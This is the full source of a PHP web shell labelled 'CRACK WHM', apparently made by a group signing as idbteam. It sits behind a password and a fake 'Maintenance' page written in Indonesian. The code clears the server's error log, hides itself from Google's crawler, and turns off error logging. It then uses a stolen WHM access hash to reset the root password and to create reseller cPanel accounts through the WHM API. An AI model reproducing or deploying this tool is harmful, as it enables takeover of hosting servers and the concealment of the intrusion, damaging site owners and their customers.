RWHM ./idbte4m

1. <?php
2.  $auth_pass="4f4adcbf8c6f66dcfc8a3282ac2bf10a";
3. $root=$_SERVER['DOCUMENT_ROOT'];
4. $file='error_log';
5. $cek=file_exists($root.'/'.$file)?true:false;
6. if($cek){
7. $reset=fopen("$root/$file","w");
8. fwrite($reset,'');
9. fclose($reset);}
10. $color="#00ff00";
11. $default_action='FilesMan';
12. @define('SELF_PATH',__FILE__);
13. if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false){
14. header('HTTP/1.0 404 Not Found');
15. exit;}
16. @session_start();
17. @error_reporting(0);
18. @ini_set('error_log',NULL);
19. @ini_set('log_errors',0);
20. @ini_set('max_execution_time',0);
21. @ini_set('output_buffering',0);
22. @ini_set('display_errors',0);
23. @set_time_limit(0);
24. @set_magic_quotes_runtime(0);
25. @define('VERSION','2.1');
26. if(get_magic_quotes_gpc()){
27. function stripslashes_array($array){
28. return is_array($array)?array_map('stripslashes_array',$array):stripslashes($array);}$_POST=stripslashes_array($_POST);}
29. function printLogin(){
30. ?>
31. <title>Perbaikan BOS.../idbte4m</title>
32. <div style='border:3px dotted lime;background:url(http://tamejo.xtgem.com/bg/1.jpg);'><center><h1><u>Maintenance</u></h1><br>Maaf.. Web sedang dalam perbaikan, silahkan kembali beberapa saat lagi.  <br> <img src="http://file-ku.mobie.in/img/idb1.png"><br><?php
33.  if(isset($_REQUEST['go'])){
34. switch($_REQUEST['go']){
35. case "./idbteam":
36. ?>
37. <form method='POST'><input type='password' maxlength='30' name='pass'><input type='submit' value='berangkat...' name='login'><p>
38. <h3>visit : <a href="http://blogs.goenktea.net">My Blogs</a> <br> created : Goenk Tea</h3></p>
39. </b></font></div></div></div></center>
40.     <?php  break;}}
41. exit;}
42. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))if(empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)))$_SESSION[md5($_SERVER['HTTP_HOST'])]=true;elseprintLogin();
43. @ini_set('output_buffering',0);
44. @ini_set('display_errors',0);
45. set_time_limit(0);ini_set('memory_limit','64M');
46. header('Content-Type: text/html; charset=UTF-8');
47. function letItBy(){ob_flush();flush();}
48. $whm_interface_path='/usr/local/cpanel/Cpanel/Accounting.php.inc';
49. function getVar($name,$def=''){
50. if(isset($_REQUEST[$name]))return $_REQUEST[$name];elsereturn $def;}
51. @ini_set('display_errors',0);
52. class Whm{
53. var $controller=true;
54. var $host=null;
55. var $user=null;
56. var $accessHash=null;
57. var $errors=array();
58. var $fp=null;
59. function startup(&$controller){
60. $this->controller=&$controller;}
61. function init($host,$user,$accessHash){
62. $this->host=$host;
63. $this->user=$user;
64. $accessHash=str_replace(array("\r","\n"),"",$accessHash);
65. $this->accessHash=$accessHash;}
66. function connect($api_path){$this->fp=fsockopen("ssl://".$this->host,2087,$errno,$errstr,30);if($errno == 0 && $this->fp == false){$this->errors[]="Socket Error: Could not initialize socket.";return false;}elseif($this->fp == false){$this->errors[]="Socket Error #".$errno.": ".$errstr;return false;}$header="";$header .= "GET ".$api_path." HTTP/1.0\r\n";$header .= "Host: ".$this->host."\r\n";$header .= "Connection: Close\r\n";$header .= "Authorization: WHM ".$this->user.":".$this->accessHash."\r\n";$header .= "\r\n";if(!@fputs($this->fp,$header)){$this->errors[]='Unable to send header.';return false;}}function disconnect(){fclose($this->fp);}function getOutput(){$rawResult="";while(!feof($this->fp)){$rawResult .= @fgets($this->fp,128);}$rawResultParts=explode("\r\n\r\n",$rawResult);$result=$rawResultParts[1];return $result;}function version(){$this->connect('/xml-api/version');$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);return $xml->version;}function gethostname(){$this->connect('/xml-api/gethostname');$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);return $xml->hostname;}function listaccts(){$this->connect('/xml-api/listaccts');$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new DOMDocument();$xml->loadXML($xmlstr);$list=$xml->getElementsByTagName('user');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['user']=$item->nodeValue;$i++;}}$list=$xml->getElementsByTagName('domain');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['domain']=$item->nodeValue;$i++;}}$list=$xml->getElementsByTagName('plan');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['package']=$item->nodeValue;$i++;}}$list=$xml->getElementsByTagName('unix_startdate');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['start_date']=$item->nodeValue;$i++;}}return $result;}function listPkgs(){$this->connect('/xml-api/listpkgs');$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new DOMDocument();$xml->loadXML($xmlstr);$list=$xml->getElementsByTagName('name');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['package_name']=$item->nodeValue;$i++;}}$list=$xml->getElementsByTagName('QUOTA');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['package_quota']=$item->nodeValue;$i++;}}$list=$xml->getElementsByTagName('BWLIMIT');$i=0;foreach($list AS $element){foreach($element->childNodes AS $item){$result[$i]['package_bw_limit']=$item->nodeValue;$i++;}}return $result;}function createAccount($acctDomain,$acctUser,$acctPass,$acctPackg){$this->connect("/xml-api/createacct?username=$acctUser&password=$acctPass&plan=$acctPackg&domain=$acctDomain&ip=y&cgi=y&frontpage=y&cpmod=x3&useregns=1&reseller=1");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->result->status == 1){$result['status']=$xml->result->status;$result['statusmsg']=$xml->result->statusmsg;$result['ip']=$xml->result->options->ip;$result['nameserver']=$xml->result->options->nameserver;$result['nameserver2']=$xml->result->options->nameserver2;$result['nameserver3']=$xml->result->options->nameserver3;$result['nameserver4']=$xml->result->options->nameserver4;$result['package']=$xml->result->options->package;$result['rawout']=$xml->result->rawout;return $result;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function accountsummary($accUser){$this->connect("/xml-api/accountsummary?user=$accUser");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->status == 1){$result['disklimit']=$xml->acct->disklimit;$result['diskused']=$xml->acct->diskused;$result['diskused']=$xml->acct->diskused;$result['domain']=$xml->acct->domain;$result['email']=$xml->acct->email;$result['ip']=$xml->acct->ip;$result['owner']=$xml->acct->owner;$result['partition']=$xml->acct->partition;$result['plan']=$xml->acct->plan;$result['startdate']=$xml->acct->startdate;$result['theme']=$xml->acct->theme;$result['unix_startdate']=$xml->acct->unix_startdate;$result['user']=$xml->acct->user;return $result;}else{$this->errors[]=$xml->statusmsg;return false;}}function passwd($accUser,$pass){$this->connect("/xml-api/passwd?user=$accUser&pass=$pass");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->passwd->status == 1){$result['statusmsg']=$xml->passwd->statusmsg;$result['frontpage']=$xml->passwd->frontpage;$result['ftp']=$xml->passwd->ftp;$result['mail']=$xml->passwd->mail;$result['mysql']=$xml->passwd->mysql;$result['system']=$xml->passwd->system;$result['rawout']=$xml->passwd->rawout;return $result;}else{$this->errors[]=$xml->passwd->statusmsg;return false;}}function suspend($acctUser,$reason){$this->connect("/xml-api/suspendacct?user=$acctUser&reason=$reason");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->result->status == 1){return $xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function unsuspend($acctUser){$this->connect("/xml-api/unsuspendacct?user=$acctUser");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->result->status == 1){return $xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function terminate($acctUser,$keepDns=0){$this->connect("/xml-api/removeacct?user=$acctUser&keepdns=$keepDns");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->result->status == 1){return $xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function Email_listpopswithdisk($user,$domain){$this->connect("/xml-api/cpanel?user=$user&xmlin=<cpanelaction><module>Email</module><func>listpopswithdisk</func><args><domain>$domain</domain></args></cpanelaction>");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();if($xmlstr){$xml= new SimpleXMLElement($xmlstr);$i=0;foreach($xml->data as $entry){$result[$i]['domain']=htmlentities((string)$entry->domain);$result[$i]['user']=htmlentities((string)$entry->user);$result[$i]['login']=htmlentities((string)$entry->login);$result[$i]['email']=htmlentities((string)$entry->email);$result[$i]['_diskquota']=htmlentities((string)$entry->_diskquota);$result[$i]['_diskused']=htmlentities((string)$entry->_diskused);$result[$i]['diskquota']=htmlentities((string)$entry->diskquota);$result[$i]['diskused']=htmlentities((string)$entry->diskused);$result[$i]['diskusedpercent']=htmlentities((string)$entry->diskusedpercent);$result[$i]['diskusedpercent20']=htmlentities((string)$entry->diskusedpercent20);$result[$i]['humandiskquota']=htmlentities((string)$entry->humandiskquota);$result[$i]['humandiskused']=htmlentities((string)$entry->humandiskused);$result[$i]['txtdiskquota']=htmlentities((string)$entry->txtdiskquota);$i++;}return $result;}else{$this->errors[]='Some errors occured.';return false;}}function changepackage($accUser,$pkg){$this->connect("/xml-api/changepackage?user=$accUser&pkg=$pkg");$xmlstr=$this->getOutput();if($xmlstr == ''){$this->errors[]='No output.';return false;}$this->disconnect();$xml= new SimpleXMLElement($xmlstr);if($xml->result->status == 1){$result['statusmsg']=$xml->result->statusmsg;$result['rawout']=$xml->result->rawout;return $result;}else{$this->errors[]=$xml->result->statusmsg;return false;}}}
67. ?>
68.  
69. <html>
70.  
71. <head>
72.  
73. <title>Combrooo</title>
74.  
75. </head>
76.  
77. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
78.  
79. <STYLE>
80.  
81. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
82.  
83. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
84.  
85. body {
86.  
87. font-family: Tahoma
88.  
89. }
90.  
91. tr {
92.  
93. BORDER: dashed 1px #333;
94.  
95. color: #FFF;
96.  
97. }
98.  
99. td {
100.  
101. BORDER: dashed 1px #333;
102.  
103. color: #FFF;
104.  
105. }
106.  
107. .table1 {
108.  
109. BORDER: 0px Black;
110.  
111. BACKGROUND-COLOR: Black;
112.  
113. color: #FFF;
114.  
115. }
116.  
117. .td1 {
118.  
119. BORDER: 0px;
120.  
121. BORDER-COLOR: #333333;
122.  
123. font: 7pt Verdana;
124.  
125. color: Green;
126.  
127. }
128.  
129. .tr1 {
130.  
131. BORDER: 0px;
132.  
133. BORDER-COLOR: #333333;
134.  
135. color: #FFF;
136.  
137. }
138.  
139. table {
140.  
141. BORDER: dashed 1px #333;
142.  
143. BORDER-COLOR: #333333;
144.  
145. BACKGROUND-COLOR: Black;
146.  
147. color: #FFF;
148.  
149. }
150.  
151. input {
152.  
153. border : dashed 1px;
154.  
155. border-color : #333;
156.  
157. BACKGROUND-COLOR: Black;
158.  
159. font: 8pt Verdana;
160.  
161. color: lime;
162.  
163. }
164.  
165. select {
166.  
167. BORDER-RIGHT:  Black 1px solid;
168.  
169. BORDER-TOP: #DF0000 1px solid;
170.  
171. BORDER-LEFT: #DF0000 1px solid;
172.  
173. BORDER-BOTTOM: Black 1px solid;
174.  
175. BORDER-color: #FFF;
176.  
177. BACKGROUND-COLOR: Black;
178.  
179. font: 8pt Verdana;
180.  
181. color: lime;
182.  
183. }
184.  
185. submit {
186.  
187. BORDER:  buttonhighlight 2px outset;
188.  
189. BACKGROUND-COLOR: Black;
190.  
191. width: 30%;
192.  
193. color: #FFF;
194.  
195. }
196.  
197. textarea {
198.  
199. border : dashed 1px #333;
200.  
201. BACKGROUND-COLOR: Black;
202.  
203. font: Fixedsys bold;
204.  
205. color: #999;
206.  
207. }
208.  
209. BODY {
210.  
211. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
212.  
213. margin: 1px;
214.  
215. color: Red;
216.  
217. background-color: Black;
218.  
219. }
220.  
221. .main {
222.  
223. margin: -287px 0px 0px -490px;
224.  
225. BORDER: dashed 1px #333;
226.  
227. BORDER-COLOR: #333333;
228.  
229. }
230.  
231. .tt {
232.  
233. background-color: Black;
234.  
235. }
236.  
237. .areaz { margin:auto;
238.  
239. border:1px solid lime;
240.  
241. width:60%;
242.  
243. height:170px;
244.  
245. background:#000000;
246.  
247. padding:0 2px; }
248.  
249. A:link {
250.  
251. COLOR: White; TEXT-DECORATION: none
252.  
253. }
254.  
255. A:visited {
256.  
257. COLOR: White; TEXT-DECORATION: none
258.  
259. }
260.  
261. A:hover {
262.  
263. color: Red; TEXT-DECORATION: none
264.  
265. }
266.  
267. A:active {
268.  
269. color: Red; TEXT-DECORATION: none
270.  
271. }
272.  
273. #result{margin:10px;}
274.  
275. #result span{display:block;}
276.  
277. #result .X{background-color:#101010;}
278.  
279. #result .Y{background-color:green;}
280.  
281. #result .Z{background-color:red;}
282.  
283.  
284.  
285. </STYLE>
286.  
287. <script language=\'javascript\'>
288.  
289. function hide_div(id){
290.  
291.   document.getElementById(id).style.display = \'none\';
292.  
293.   document.cookie=id+\'=0;\';
294.  
295. }
296.  
297.  
298.  
299. function show_div(id){
300.  
301.   document.getElementById(id).style.display = \'block\';
302.  
303.   document.cookie=id+\'=1;\';
304.  
305. }
306.  
307.  
308.  
309. function change_divst(id){
310.  
311.   if (document.getElementById(id).style.display == \'none\')
312.  
313.     show_div(id);
314.  
315.   else
316.  
317.     hide_div(id);
318.  
319. }
320.  
321. </script>
322.  
323. </td></table></tr>
324.  
325. <br>
326.  
327. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
328.  
329. <style>
330.  
331. body { font-family: 'Audiowide', serif;font-size: 30px;}
332.  
333. </style></head><center>
334.  
335. <h1>CRACK WHM</h1>
336.  
337. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia"><br/>
338.  
339. <table border="1" bordercolor=red>
340.  
341. <tr>
342.  
343. <td width="700">
344.  
345. <center>
346.  
347. <form method="post" name="pageform"
348.  
349. action="" onsubmit="return validate(this);">
350.  
351. <form method="post">
352.  
353. <div align="center"><h2>Generate PassWord </h2></div>
354.  
355. <center><table width="500" border="1">
356.  
357. <tbody><tr><td><center>Access Hash<textarea rows="3" cols="40" name="hashwhm"
358.  
359. value=""></textarea></center></td></tr></tbody></table>
360.  
361. <table border="1">
362.  
363. <tbody><tr><td><center> Host/ IP     <input name="ipwhm" value="127.0.0.1"></center></td><td><center>Username<input name="userwhm" value="root"></center></td></tr>
364.  
365. </tbody></table>
366.  
367. <center><table border="1">
368.  
369. <tbody><tr><td> Pw Baru: </ td><td><input name="passwhm" value="123asdf@@@" size="25"></td></tr>
370.  
371. <tr><td colspan="3"><center><input class="button" type="submit" name="submit" value="Reset PassWord"></td></tr></table><tr><td><nobr>
372.  
373. <center><input name="cp-creator" type="submit" value=" CP Creator " id="button"/>
374.  
375. </nobr></td></tr></table>
376.  
377. </form>
378.  
379. <table>
380.  
381. <div align="center"><br/>
382.  
383. <!-- lets start making exploit -->
384.  
385. <!-- cpanel creator -->
386.  
387.  
388.  
389. <?php
390.  if(isset($_POST['cp-creator'])){
391. ?>
392.  
393. <br><div id="result"><br>
394.  
395. <form method="post">
396.  
397. <div align="center"><h2>cPanel Account Creator </h2></div>
398.  
399. <center><table width="500" border="1">
400.  
401. <tbody><tr><td><center>Access Hash<textarea rows="3" cols="40" name="hash"
402.  
403. value=""></textarea></center></td></tr></tbody></table>
404.  
405. <table border="1">
406.  
407. <tbody><tr><td><center> Host/ IP     <input name="host" value="127.0.0.1"></center></td><td><center>Username<input name="whm" value="root"></center></td></tr>
408.  
409. </tbody></table>
410.  
411. <p> <h3><u>info akun baru </u></h3> <center><table border="1">
412.  
413. <tbody><tr><td> Domain: </ td><td><input name="domain" value="domain-kamu.com" size="25"></td></tr>
414.  
415. <tr><td> Username: </td><td><input name="user" value="combro" size="25">
416.  
417. </td></tr>
418.  
419. <tr><td> Password: </td><td><input name="password" value="123asdf@@@" size="25"></td><td></td></tr>
420.  
421. <tr><td> Package: </td><td><input name="package" value="default" size="25"></td></tr>
422.  
423. </table>
424.  
425.  
426.  
427. <tr><td colspan="3"><br /><center><input class="button" type="submit" name="submit" value="Create Account"></td></tr></table>
428.  
429. <?php  }
430. ?>
431.  
432. <?php
433.  set_time_limit(0);if(isset($_POST['submit'])){echo '<div id="result">';if(!isset($whm_user)){$whm_user=getVar('whm');}if(!isset($whm_host)){$whm_host=getVar('host');}$whm_usessl=1;if(!isset($whm_key)){$whm_key=getVar('hash');}if(!isset($user_domain)){$user_domain=getVar('domain');}if(!isset($user_name)){$user_name=getVar('user');}if(!isset($user_pass)){$user_pass=getVar('password');}if(!isset($user_plan)){$user_plan=getVar('package');}if(!file_exists($whm_interface_path)){die($whm_interface_path." does not exist. Please update program with correct path to your WHM interface file.");}if(!empty($user_name)){require_once$whm_interface_path;$result=createacct($whm_host,$whm_user,$whm_key,$whm_usessl,$user_domain,$user_name,$user_pass,$user_plan);}echo "<h2><b><u>RESULT:</u></b></h2> <span class=X>$result</span>";echo "</div>";}
434. ?>
435.  
436. <!-- Reset PassWord -->
437.  
438. <?php
439.  if(isset($_POST['cp-pass'])){
440. ?>
441.  
442. <br><div id="result"><br>
443.  
444.  
445.  
446. <?php  }
447. ?>
448.  
449. <?php
450.  set_time_limit(0);if(isset($_POST['submit'])){echo '<div id="result">';$idbteam404= new whm;if(!isset($ipwhm)){$ipwhm=getVar('hashwhm');}if(!isset($userwhm)){$userwhm=getVar('userwhm');}if(!isset($hashwhm)){$hashwhm=getVar('ipwhm');}if(!isset($passbaru)){$passbaru=getVar('passwhm');}$idbteam404->init($hashwhm,$userwhm,$ipwhm);$hostname=$idbteam404->gethostname();echo "Host name: $hostname <br>";$version=$idbteam404->version();echo "Cpanel/whm version is: $version <br><pre>";$result=$idbteam404->passwd($userwhm,$passbaru);if($result){print_r($result);}else{print_r($idbteam404->errors);}
451. ?>
452.  
453. <?php  }
454. ?>
455.  
456.  
457.  
458. <!-- exploit done -->
459.  
460. <!--  yeaah i'm handsome -->
461.  
462.  
463.  
464. </center></td></table></body></html>